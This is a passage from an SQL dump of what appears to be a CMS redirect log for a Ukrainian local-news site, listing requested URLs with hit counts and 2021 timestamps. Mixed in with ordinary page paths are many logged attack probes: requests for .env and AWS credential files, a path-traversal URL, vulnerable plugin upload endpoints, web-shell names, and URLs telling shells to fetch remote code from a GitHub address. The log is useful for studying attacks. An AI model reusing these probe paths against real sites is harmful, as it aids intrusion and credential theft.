00:00:00',301),(36368,'https://malehus.in.ua/public/.env',NULL,'','',62,0,'2021-04-26 00:44:22','0000-00-00 00:00:00',301),(36369,'https://malehus.in.ua/__media__/js/netsoltrademark.php?d=baidu.com',NULL,'','',1,0,'2021-05-04 16:32:06','0000-00-00 00:00:00',301),(36370,'https://malehus.in.ua/index.php/8-novini-2/2471-vikonannya-dokhidnoji-chastini-mistsevikh-byudzhetiv-poki-shcho-malinskogo-rajonu-za-8-misyatsiv-2020-roku',NULL,'','',10,0,'2021-05-05 09:47:42','0000-00-00 00:00:00',301),(36371,'https://malehus.in.ua/index.php?option=com_contact&view=contact&id=8',NULL,'http://malehus.in.ua/index.php?option=com_contact&view=contact&id=8','',1,0,'2021-05-08 19:48:46','0000-00-00 00:00:00',301),(36372,'https://malehus.in.ua/index.php?option=com_contact&view=contact&id=10',NULL,'http://malehus.in.ua/index.php?option=com_contact&view=contact&id=10','',4,0,'2021-05-08 23:41:57','0000-00-00 00:00:00',301),(36373,'https://malehus.in.ua/index.php?option=com_contact&view=contact&id=9',NULL,'http://malehus.in.ua/index.php?option=com_contact&view=contact&id=9','',4,0,'2021-05-09 02:43:48','0000-00-00 00:00:00',301),(36374,'https://malehus.in.ua/api/search?folderids=0',NULL,'','',4,0,'2021-05-13 18:49:30','0000-00-00 00:00:00',301),(36375,'https://malehus.in.ua/idx_config/',NULL,'','',1,0,'2021-05-13 18:49:30','0000-00-00 00:00:00',301),(36376,'https://malehus.in.ua/telescope/requests',NULL,'','',4,0,'2021-05-13 18:49:31','0000-00-00 00:00:00',301),(36377,'https://www.malehus.in.ua/v2/_catalog',NULL,'','',4,0,'2021-05-13 18:49:31','0000-00-00 00:00:00',301),(36378,'https://www.malehus.in.ua/.env',NULL,'','',11,0,'2021-05-13 18:49:32','0000-00-00 00:00:00',301),(36379,'https://malehus.in.ua/config.json',NULL,'','',6,0,'2021-05-13 18:49:32','0000-00-00 00:00:00',301),(36380,'https://malehus.in.ua/v2/_catalog',NULL,'','',4,0,'2021-05-13 18:49:33','0000-00-00 00:00:00',301),(36381,'https://malehus.in.ua/info.php',NULL,'','',57,0,'2021-05-13 18:49:33','0000-00-00 00:00:00',301),(36382,'https://www.malehus.in.ua/telescope/requests',NULL,'','',4,0,'2021-05-13 18:49:33','0000-00-00 00:00:00',301),(36383,'https://www.malehus.in.ua/api/search?folderids=0',NULL,'','',4,0,'2021-05-13 18:49:34','0000-00-00 00:00:00',301),(36384,'https://www.malehus.in.ua/idx_config/',NULL,'','',1,0,'2021-05-13 18:49:35','0000-00-00 00:00:00',301),(36385,'https://www.malehus.in.ua/info.php',NULL,'','',4,0,'2021-05-13 18:49:35','0000-00-00 00:00:00',301),(36386,'https://www.malehus.in.ua/config.json',NULL,'','',4,0,'2021-05-13 18:49:36','0000-00-00 00:00:00',301),(36387,'https://malehus.in.ua/index.php/holuby/poshtovi/8-novini-2/2509-perekhodimo-na-litnij-chas',NULL,'','',1,0,'2021-05-15 10:07:43','0000-00-00 00:00:00',301),(36388,'https://malehus.in.ua/index.php/8-novini-2/2436-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-7-misyatsiv-2020-roku',NULL,'','',2,0,'2021-05-24 06:28:32','0000-00-00 00:00:00',301),(36389,'https://malehus.in.ua/index.php/oholoshennia/8-novini-2/2471-vikonannya-dokhidnoji-chastini-mistsevikh-byudzhetiv-poki-shcho-malinskogo-rajonu-za-8-misyatsiv-2020-roku',NULL,'','',2,0,'2021-05-24 06:47:07','0000-00-00 00:00:00',301),(36390,'https://malehus.in.ua/index.php/kontakti/8-novini-2/2471-vikonannya-dokhidnoji-chastini-mistsevikh-byudzhetiv-poki-shcho-malinskogo-rajonu-za-8-misyatsiv-2020-roku',NULL,'','',2,0,'2021-05-24 09:13:29','0000-00-00 00:00:00',301),(36391,'https://malehus.in.ua/index.php/sadivnytstvo/dohliad/8-novini-2/2471-vikonannya-dokhidnoji-chastini-mistsevikh-byudzhetiv-poki-shcho-malinskogo-rajonu-za-8-misyatsiv-2020-roku',NULL,'','',2,0,'2021-05-24 19:51:39','0000-00-00 00:00:00',301),(36392,'https://malehus.in.ua/index.php/rizni-porady/8-novini-2/2471-vikonannya-dokhidnoji-chastini-mistsevikh-byudzhetiv-poki-shcho-malinskogo-rajonu-za-8-misyatsiv-2020-roku',NULL,'','',4,0,'2021-05-26 04:45:06','0000-00-00 00:00:00',301),(36393,'https://malehus.in.ua/index.php/sadivnytstvo/8-novini-2/2471-vikonannya-dokhidnoji-chastini-mistsevikh-byudzhetiv-poki-shcho-malinskogo-rajonu-za-8-misyatsiv-2020-roku',NULL,'','',2,0,'2021-05-26 09:02:38','0000-00-00 00:00:00',301),(36394,'https://malehus.in.ua/index.php/sadivnytstvo/zasoby-zakhystu/8-novini-2/2471-vikonannya-dokhidnoji-chastini-mistsevikh-byudzhetiv-poki-shcho-malinskogo-rajonu-za-8-misyatsiv-2020-roku',NULL,'','',2,0,'2021-05-26 09:59:50','0000-00-00 00:00:00',301),(36395,'https://malehus.in.ua/index.php/oholoshennia/8-novini-2/2436-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-7-misyatsiv-2020-roku',NULL,'','',1,0,'2021-05-27 05:23:34','0000-00-00 00:00:00',301),(36396,'https://malehus.in.ua/index.php/holuby/8-novini-2/2471-vikonannya-dokhidnoji-chastini-mistsevikh-byudzhetiv-poki-shcho-malinskogo-rajonu-za-8-misyatsiv-2020-roku',NULL,'','',2,0,'2021-05-27 07:08:50','0000-00-00 00:00:00',301),(36397,'https://malehus.in.ua/wp-admin/admin-ajax.php?action=showbiz_ajax_action&client_action=update_plugin',NULL,'http://www.google.com/','',2,0,'2021-05-27 19:25:05','0000-00-00 00:00:00',301),(36398,'https://malehus.in.ua/wp-content/plugins/cherry-plugin/admin/css/tinymce-shortcodes.css',NULL,'http://www.google.com/','',2,0,'2021-05-28 08:20:48','0000-00-00 00:00:00',301),(36399,'https://malehus.in.ua/index.php/holuby/pavliny-pavychi/8-novini-2/2471-vikonannya-dokhidnoji-chastini-mistsevikh-byudzhetiv-poki-shcho-malinskogo-rajonu-za-8-misyatsiv-2020-roku',NULL,'','',3,0,'2021-05-29 03:24:01','0000-00-00 00:00:00',301),(36400,'https://malehus.in.ua/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=upload.php',NULL,'http://www.google.com/','',2,0,'2021-05-29 07:59:18','0000-00-00 00:00:00',301),(36401,'https://malehus.in.ua/index.php/holuby/kinhy/8-novini-2/2471-vikonannya-dokhidnoji-chastini-mistsevikh-byudzhetiv-poki-shcho-malinskogo-rajonu-za-8-misyatsiv-2020-roku',NULL,'','',2,0,'2021-05-29 09:08:31','0000-00-00 00:00:00',301),(36402,'https://malehus.in.ua/index.php/kontakti/8-novini-2/2436-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-7-misyatsiv-2020-roku',NULL,'','',1,0,'2021-05-30 14:23:52','0000-00-00 00:00:00',301),(36403,'https://malehus.in.ua/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin',NULL,'http://www.google.com/','',3,0,'2021-05-31 19:02:52','0000-00-00 00:00:00',301),(36404,'https://malehus.in.ua/index.php/holuby/poshtovi/8-novini-2/2471-vikonannya-dokhidnoji-chastini-mistsevikh-byudzhetiv-poki-shcho-malinskogo-rajonu-za-8-misyatsiv-2020-roku',NULL,'','',1,0,'2021-06-03 16:49:31','0000-00-00 00:00:00',301),(36405,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/12_1.jpg',NULL,'','',7,0,'2021-06-08 23:41:46','0000-00-00 00:00:00',301),(36406,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/rizdvo.jpg',NULL,'','',5,0,'2021-06-09 17:22:25','0000-00-00 00:00:00',301),(36407,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/dox8m2020_rnn.jpg',NULL,'','',3,0,'2021-06-10 05:42:46','0000-00-00 00:00:00',301),(36408,'https://www.malehus.in.ua/favicon.ico',NULL,'','',46,0,'2021-06-15 12:38:25','0000-00-00 00:00:00',301),(36409,'https://malehus.in.ua/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php',NULL,'','',1,0,'2021-06-16 03:08:45','0000-00-00 00:00:00',301),(36410,'https://malehus.in.ua/administrator/images/stories/0053333.gif',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',2,0,'2021-06-17 18:42:11','0000-00-00 00:00:00',301),(36411,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/censor.jpg',NULL,'','',2,0,'2021-06-17 18:50:08','0000-00-00 00:00:00',301),(36412,'https://malehus.in.ua/administrator/images/stories/gol_20210615_140144_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-06-17 19:13:05','0000-00-00 00:00:00',301),(36413,'https://malehus.in.ua/administrator/images/stories/gol_20210615_140145_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-06-17 19:13:33','0000-00-00 00:00:00',301),(36414,'https://malehus.in.ua/administrator/images/stories/gol_20210615_140146_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-06-17 19:13:51','0000-00-00 00:00:00',301),(36415,'https://malehus.in.ua/administrator/images/stories/gol_20210615_140148_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-06-17 19:14:09','0000-00-00 00:00:00',301),(36416,'https://malehus.in.ua/administrator/images/stories/gol_20210615_140149_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-06-17 19:14:26','0000-00-00 00:00:00',301),(36417,'https://malehus.in.ua/administrator/images/stories/gol_20210615_140143_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-06-17 19:14:55','0000-00-00 00:00:00',301),(36418,'https://malehus.in.ua/administrator/images/stories/gol_20210615_140150_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-06-17 19:15:17','0000-00-00 00:00:00',301),(36419,'https://malehus.in.ua/administrator/images/stories/121212.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-06-17 19:30:24','0000-00-00 00:00:00',301),(36420,'https://malehus.in.ua/administrator/images/stories/img_20210616_181613.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-06-17 19:31:16','0000-00-00 00:00:00',301),(36421,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/121212.jpg',NULL,'','',3,0,'2021-06-17 19:32:38','0000-00-00 00:00:00',301),(36422,'https://malehus.in.ua/files/index.php?file=tf2rghf.jpg',NULL,'http://www.google.com/','',3,0,'2021-06-19 11:46:33','0000-00-00 00:00:00',301),(36423,'https://malehus.in.ua/components/com_redmystic/chart/ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2021-06-19 21:14:33','0000-00-00 00:00:00',301),(36424,'https://malehus.in.ua/index.php?option=com_acymailing&ctrl=frontmails&task=setnewiconshare',NULL,'http://www.google.com/','',3,0,'2021-06-19 21:47:04','0000-00-00 00:00:00',301),(36425,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/gol_20210615_140144_1.jpg',NULL,'','',2,0,'2021-06-20 14:30:38','0000-00-00 00:00:00',301),(36426,'https://malehus.in.ua/data/owncloud.log',NULL,'','',3,0,'2021-06-20 23:45:41','0000-00-00 00:00:00',301),(36427,'https://malehus.in.ua/data/nextcloud.log',NULL,'','',3,0,'2021-06-20 23:49:52','0000-00-00 00:00:00',301),(36428,'https://malehus.in.ua/nextcloud/data/nextcloud.log',NULL,'','',3,0,'2021-06-20 23:54:50','0000-00-00 00:00:00',301),(36429,'https://malehus.in.ua/owncloud/data/owncloud.log',NULL,'','',3,0,'2021-06-20 23:55:39','0000-00-00 00:00:00',301),(36430,'https://malehus.in.ua/index.php?option=com_user&task=register',NULL,'','',1,0,'2021-06-21 02:47:25','0000-00-00 00:00:00',301),(36431,'https://malehus.in.ua/index.php/joomla/other-components/registration-form',NULL,'','',1,0,'2021-06-21 02:47:26','0000-00-00 00:00:00',301),(36432,'https://malehus.in.ua/index.php?option=com_community&view=register',NULL,'','',1,0,'2021-06-21 02:47:29','0000-00-00 00:00:00',301),(36433,'https://malehus.in.ua/index.php/component/user/register.html',NULL,'','',1,0,'2021-06-21 02:47:30','0000-00-00 00:00:00',301),(36434,'https://malehus.in.ua/index.php/registration/registers',NULL,'','',1,0,'2021-06-21 02:47:30','0000-00-00 00:00:00',301),(36435,'https://malehus.in.ua/registratsiya/registers',NULL,'','',1,0,'2021-06-21 02:47:30','0000-00-00 00:00:00',301),(36436,'https://malehus.in.ua/component/comprofiler/registers.html',NULL,'','',1,0,'2021-06-21 02:47:31','0000-00-00 00:00:00',301),(36437,'https://malehus.in.ua/user/registration',NULL,'','',1,0,'2021-06-21 02:47:31','0000-00-00 00:00:00',301),(36438,'https://malehus.in.ua/index.php?option=com_secureregistration&task=register',NULL,'','',1,0,'2021-06-21 02:47:31','0000-00-00 00:00:00',301),(36439,'https://malehus.in.ua/component/option,com_comprofiler/task,registers/',NULL,'','',1,0,'2021-06-21 02:47:33','0000-00-00 00:00:00',301),(36440,'https://malehus.in.ua/index.php?option=com_registration&task=register',NULL,'','',1,0,'2021-06-21 02:47:33','0000-00-00 00:00:00',301),(36441,'https://malehus.in.ua/index.php?option=com_comprofiler&task=registers',NULL,'','',2,0,'2021-06-21 02:47:34','0000-00-00 00:00:00',301),(36442,'https://malehus.in.ua/index.php?option=com_joocm&view=register',NULL,'','',1,0,'2021-06-21 02:47:34','0000-00-00 00:00:00',301),(36443,'https://malehus.in.ua/index.php?option=com_easysocial&view=registration',NULL,'','',1,0,'2021-06-21 02:47:35','0000-00-00 00:00:00',301),(36444,'https://malehus.in.ua/registration',NULL,'','',1,0,'2021-06-21 02:47:35','0000-00-00 00:00:00',301),(36445,'https://malehus.in.ua/index.php?option=com_user&view=register',NULL,'','',1,0,'2021-06-21 02:47:36','0000-00-00 00:00:00',301),(36446,'https://malehus.in.ua/index.php?option=com_easybookreloaded',NULL,'','',1,0,'2021-06-21 02:47:36','0000-00-00 00:00:00',301),(36447,'https://malehus.in.ua/index.php/gaestebuch/',NULL,'','',1,0,'2021-06-21 02:47:37','0000-00-00 00:00:00',301),(36448,'https://malehus.in.ua/gaestebuch',NULL,'','',1,0,'2021-06-21 02:47:37','0000-00-00 00:00:00',301),(36449,'https://malehus.in.ua/index.php?option=com_easygb',NULL,'','',1,0,'2021-06-21 02:47:37','0000-00-00 00:00:00',301),(36450,'https://malehus.in.ua/index.php?option=com_akobook',NULL,'','',1,0,'2021-06-21 02:47:38','0000-00-00 00:00:00',301),(36451,'https://malehus.in.ua/index.php?option=com_vitabook',NULL,'','',1,0,'2021-06-21 02:47:38','0000-00-00 00:00:00',301),(36452,'https://malehus.in.ua/index.php?option=com_jambook',NULL,'','',1,0,'2021-06-21 02:47:39','0000-00-00 00:00:00',301),(36453,'https://malehus.in.ua/component/jambook/',NULL,'','',1,0,'2021-06-21 02:47:39','0000-00-00 00:00:00',301),(36454,'https://malehus.in.ua/index.php/component/jambook/',NULL,'','',1,0,'2021-06-21 02:47:40','0000-00-00 00:00:00',301),(36455,'https://malehus.in.ua/guestbook/',NULL,'','',1,0,'2021-06-21 02:47:40','0000-00-00 00:00:00',301),(36456,'https://malehus.in.ua/index.php/guestbook/',NULL,'','',2,0,'2021-06-21 02:47:41','0000-00-00 00:00:00',301),(36457,'https://malehus.in.ua/index.php/gaestebuch',NULL,'','',1,0,'2021-06-21 02:47:41','0000-00-00 00:00:00',301),(36458,'https://malehus.in.ua/index.php?option=com_phocaguestbook&id=1',NULL,'','',1,0,'2021-06-21 02:47:42','0000-00-00 00:00:00',301),(36459,'https://malehus.in.ua/index.php?option=com_phocaguestbook',NULL,'','',1,0,'2021-06-21 02:47:43','0000-00-00 00:00:00',301),(36460,'https://www.malehus.in.ua/data/owncloud.log',NULL,'','',1,0,'2021-06-21 07:27:32','0000-00-00 00:00:00',301),(36461,'https://www.malehus.in.ua/data/nextcloud.log',NULL,'','',1,0,'2021-06-21 07:40:11','0000-00-00 00:00:00',301),(36462,'https://www.malehus.in.ua/nextcloud/data/nextcloud.log',NULL,'','',1,0,'2021-06-21 07:45:10','0000-00-00 00:00:00',301),(36463,'https://www.malehus.in.ua/owncloud/data/owncloud.log',NULL,'','',1,0,'2021-06-21 07:55:52','0000-00-00 00:00:00',301),(36464,'https://malehus.in.ua/wp-admin/admin-ajax.php?action=_ning_upload_image',NULL,'http://www.google.com/','',1,0,'2021-06-21 08:36:38','0000-00-00 00:00:00',301),(36465,'https://malehus.in.ua/administrator/images/stories/230621.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-06-23 08:16:46','0000-00-00 00:00:00',301),(36466,'https://www.malehus.in.ua/wp-login.php',NULL,'http://www.google.com.hk','',2,0,'2021-06-24 00:11:41','0000-00-00 00:00:00',301),(36467,'https://malehus.in.ua/ua',NULL,'https://www.google.com.ua/','',1,0,'2021-06-24 07:11:18','0000-00-00 00:00:00',301),(36468,'https://malehus.in.ua/ru',NULL,'https://www.google.com.ua/','',1,0,'2021-06-24 07:11:18','0000-00-00 00:00:00',301),(36469,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/230621.jpg',NULL,'','',2,0,'2021-06-29 11:14:47','0000-00-00 00:00:00',301),(36470,'https://malehus.in.ua/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'http://www.google.com/','',3,0,'2021-06-29 15:52:25','0000-00-00 00:00:00',301),(36471,'https://malehus.in.ua/components/com_jclassifiedsmanager/helpers/upload.php',NULL,'http://www.google.com/','',1,0,'2021-06-29 15:52:25','0000-00-00 00:00:00',301),(36472,'https://malehus.in.ua/archiver',NULL,'','',1,0,'2021-07-01 20:57:35','0000-00-00 00:00:00',301),(36473,'https://malehus.in.ua/components/com_jbusinessdirectory/assets/uploadfile.php',NULL,'http://www.google.com/','',3,0,'2021-07-02 07:37:37','0000-00-00 00:00:00',301),(36474,'https://malehus.in.ua/administrator/images/stories/zinchenko.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',2,0,'2021-07-02 11:23:13','0000-00-00 00:00:00',301),(36475,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/zinchenko.jpg',NULL,'','',1,0,'2021-07-02 11:29:25','0000-00-00 00:00:00',301),(36476,'https://malehus.in.ua/administrator/images/stories/2x11_gif.gif',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2524','',5,0,'2021-07-02 11:46:30','0000-00-00 00:00:00',301),(36477,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/2x11_gif.gif',NULL,'','',2,0,'2021-07-02 12:12:56','0000-00-00 00:00:00',301),(36478,'https://malehus.in.ua/administrator/images/stories/pensia.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2525','',1,0,'2021-07-02 12:29:31','0000-00-00 00:00:00',301),(36479,'https://malehus.in.ua/administrator/images/stories/a95.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',2,0,'2021-07-09 13:26:28','0000-00-00 00:00:00',301),(36480,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/a95.jpg',NULL,'','',1,0,'2021-07-09 13:27:24','0000-00-00 00:00:00',301),(36481,'https://malehus.in.ua/administrator/images/stories/entony.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',3,0,'2021-07-09 19:30:08','0000-00-00 00:00:00',301),(36482,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/entony.jpg',NULL,'','',1,0,'2021-07-10 20:34:01','0000-00-00 00:00:00',301),(36483,'https://malehus.in.ua/administrator/images/stories/dia.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',2,0,'2021-07-14 09:04:45','0000-00-00 00:00:00',301),(36484,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/dia.jpg',NULL,'','',1,0,'2021-07-14 09:06:43','0000-00-00 00:00:00',301),(36485,'https://malehus.in.ua/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'http://www.google.com/','',4,0,'2021-07-14 10:23:31','0000-00-00 00:00:00',301),(36486,'https://malehus.in.ua/wp-content/plugins/fluid_forms/file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'http://www.google.com/','',2,0,'2021-07-15 03:48:19','0000-00-00 00:00:00',301),(36487,'https://malehus.in.ua/wp-content/plugins/formcraft/file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'http://www.google.com/','',2,0,'2021-07-15 15:06:02','0000-00-00 00:00:00',301),(36488,'https://malehus.in.ua/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php',NULL,'http://www.google.com/','',2,0,'2021-07-17 01:14:02','0000-00-00 00:00:00',301),(36489,'https://malehus.in.ua/wp-content/plugins/wp-file-manager/lib/files/',NULL,'http://www.google.com/','',1,0,'2021-07-18 01:03:04','0000-00-00 00:00:00',301),(36490,'https://malehus.in.ua/_ignition/execute-solution',NULL,'','',4,0,'2021-07-18 05:49:16','0000-00-00 00:00:00',301),(36491,'https://malehus.in.ua/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php',NULL,'http://www.google.com/','',2,0,'2021-07-19 19:54:07','0000-00-00 00:00:00',301),(36492,'https://malehus.in.ua/index.php/8-novini-2/2474-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-8-misyatsiv-2020-roku',NULL,'','',5,0,'2021-07-31 16:40:19','0000-00-00 00:00:00',301),(36493,'https://malehus.in.ua/user/',NULL,'','',1,0,'2021-08-05 18:45:34','0000-00-00 00:00:00',301),(36494,'https://malehus.in.ua/admin/',NULL,'','',5,0,'2021-08-05 18:45:34','0000-00-00 00:00:00',301),(36495,'https://malehus.in.ua/user/login/',NULL,'','',1,0,'2021-08-05 18:45:34','0000-00-00 00:00:00',301),(36496,'https://malehus.in.ua/admin.php',NULL,'','',16,0,'2021-08-05 18:45:34','0000-00-00 00:00:00',301),(36497,'https://malehus.in.ua/admin/index.php',NULL,'','',2,0,'2021-08-05 18:45:35','0000-00-00 00:00:00',301),(36498,'https://malehus.in.ua/admin/users/login_do/',NULL,'','',1,0,'2021-08-05 18:45:35','0000-00-00 00:00:00',301),(36499,'https://malehus.in.ua/manager/',NULL,'','',1,0,'2021-08-05 18:45:35','0000-00-00 00:00:00',301),(36500,'https://malehus.in.ua/wp-admin/css/ie.css',NULL,'','',1,0,'2021-08-10 06:59:25','0000-00-00 00:00:00',301),(36501,'https://malehus.in.ua/wp-links-opml.php',NULL,'','',1,0,'2021-08-10 06:59:27','0000-00-00 00:00:00',301),(36502,'https://malehus.in.ua/wp-content/plugins/advanced_file_manager_5/files/_elghoul.php?0=up',NULL,'','',2,0,'2021-08-10 10:00:24','0000-00-00 00:00:00',301),(36503,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/army.jpg',NULL,'','',1,0,'2021-08-11 17:51:18','0000-00-00 00:00:00',301),(36504,'https://malehus.in.ua/administrator/images/stories/el.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-08-17 11:51:20','0000-00-00 00:00:00',301),(36505,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/el.jpg',NULL,'','',1,0,'2021-08-17 11:52:02','0000-00-00 00:00:00',301),(36506,'https://malehus.in.ua/index.php/holuby/kinhy/8-novini-2/2509-perekhodimo-na-litnij-chas',NULL,'','',5,0,'2021-08-19 18:21:39','0000-00-00 00:00:00',301),(36507,'https://malehus.in.ua/administrator/images/stories/240821.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-08-24 06:12:40','0000-00-00 00:00:00',301),(36508,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/240821.jpg',NULL,'','',2,0,'2021-08-24 06:16:12','0000-00-00 00:00:00',301),(36509,'https://malehus.in.ua/old/wp-login.php',NULL,'http://malehus.in.ua/old','',2,0,'2021-08-26 09:51:47','0000-00-00 00:00:00',301),(36510,'https://malehus.in.ua/new/wp-login.php',NULL,'http://malehus.in.ua/new','',2,0,'2021-08-26 09:52:10','0000-00-00 00:00:00',301),(36511,'https://malehus.in.ua/backup/wp-login.php',NULL,'http://malehus.in.ua/backup','',2,0,'2021-08-26 09:53:15','0000-00-00 00:00:00',301),(36512,'https://malehus.in.ua/web/wp-login.php',NULL,'http://malehus.in.ua/web','',2,0,'2021-08-26 09:53:34','0000-00-00 00:00:00',301),(36513,'https://malehus.in.ua/site/wp-login.php',NULL,'http://malehus.in.ua/site','',2,0,'2021-08-26 09:53:51','0000-00-00 00:00:00',301),(36514,'https://malehus.in.ua/2020/wp-login.php',NULL,'http://malehus.in.ua/2020','',2,0,'2021-08-26 09:54:09','0000-00-00 00:00:00',301),(36515,'https://malehus.in.ua/demo/wp-login.php',NULL,'http://malehus.in.ua/demo','',2,0,'2021-08-26 09:54:27','0000-00-00 00:00:00',301),(36516,'https://malehus.in.ua/index.php/8-novini-2/2509-perekhodimo-na-litnij-chas',NULL,'','',1,0,'2021-09-06 14:22:19','0000-00-00 00:00:00',301),(36517,'https://malehus.in.ua/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2021-09-09 04:49:59','0000-00-00 00:00:00',301),(36518,'https://malehus.in.ua/wordpress/wp-admin/setup-config.php?step=1',NULL,'','',2,0,'2021-09-09 05:08:36','0000-00-00 00:00:00',301),(36519,'https://malehus.in.ua/attachments/article/2491/dox11m20.xls',NULL,'','',1,0,'2021-09-10 17:58:18','0000-00-00 00:00:00',301),(36520,'https://malehus.in.ua/_profiler/phpinfo',NULL,'','',54,0,'2021-09-18 18:49:37','0000-00-00 00:00:00',301),(36521,'https://malehus.in.ua/phpinfo.php',NULL,'','',54,0,'2021-09-18 18:49:38','0000-00-00 00:00:00',301),(36522,'https://malehus.in.ua/phpinfo',NULL,'','',51,0,'2021-09-18 18:49:40','0000-00-00 00:00:00',301),(36523,'https://malehus.in.ua/aws.yml',NULL,'','',51,0,'2021-09-18 18:49:43','0000-00-00 00:00:00',301),(36524,'https://malehus.in.ua/.env.bak',NULL,'','',53,0,'2021-09-18 18:49:46','0000-00-00 00:00:00',301),(36525,'https://malehus.in.ua/.aws/credentials',NULL,'','',48,0,'2021-09-18 18:49:49','0000-00-00 00:00:00',301),(36526,'https://malehus.in.ua/config/aws.yml',NULL,'','',48,0,'2021-09-18 18:49:52','0000-00-00 00:00:00',301),(36527,'https://malehus.in.ua/config.js',NULL,'','',48,0,'2021-09-18 18:49:55','0000-00-00 00:00:00',301),(36528,'https://malehus.in.ua/wp-content/',NULL,'','',38,0,'2021-09-19 13:16:23','0000-00-00 00:00:00',301),(36529,'https://malehus.in.ua/license.txt',NULL,'','',1,0,'2021-09-23 03:09:43','0000-00-00 00:00:00',301),(36530,'https://malehus.in.ua/style.php',NULL,'anonymousfox.co','',44,0,'2021-09-29 16:38:28','0000-00-00 00:00:00',301),(36531,'https://malehus.in.ua/moduless.php',NULL,'anonymousfox.co','',23,0,'2021-09-29 16:38:36','0000-00-00 00:00:00',301),(36532,'https://malehus.in.ua/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:38:40','0000-00-00 00:00:00',301),(36533,'https://malehus.in.ua/boom.php?x',NULL,'anonymousfox.co','',5,0,'2021-09-29 16:38:56','0000-00-00 00:00:00',301),(36534,'https://malehus.in.ua/wp-content/plugins/backup_index.php',NULL,'anonymousfox.co','',22,0,'2021-09-29 16:38:59','0000-00-00 00:00:00',301),(36535,'https://malehus.in.ua/wp-content/db_cache.php',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:39:06','0000-00-00 00:00:00',301),(36536,'https://malehus.in.ua/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'anonymousfox.co','',13,0,'2021-09-29 16:39:11','0000-00-00 00:00:00',301),(36537,'https://malehus.in.ua/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:39:15','0000-00-00 00:00:00',301),(36538,'https://malehus.in.ua/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:39:21','0000-00-00 00:00:00',301),(36539,'https://malehus.in.ua/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:39:25','0000-00-00 00:00:00',301),(36540,'https://malehus.in.ua/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:39:31','0000-00-00 00:00:00',301),(36541,'https://malehus.in.ua/alfindex.php',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:39:40','0000-00-00 00:00:00',301),(36542,'https://malehus.in.ua/alfa.php',NULL,'anonymousfox.co','',47,0,'2021-09-29 16:39:46','0000-00-00 00:00:00',301),(36543,'https://malehus.in.ua/wp-booking.php',NULL,'anonymousfox.co','',22,0,'2021-09-29 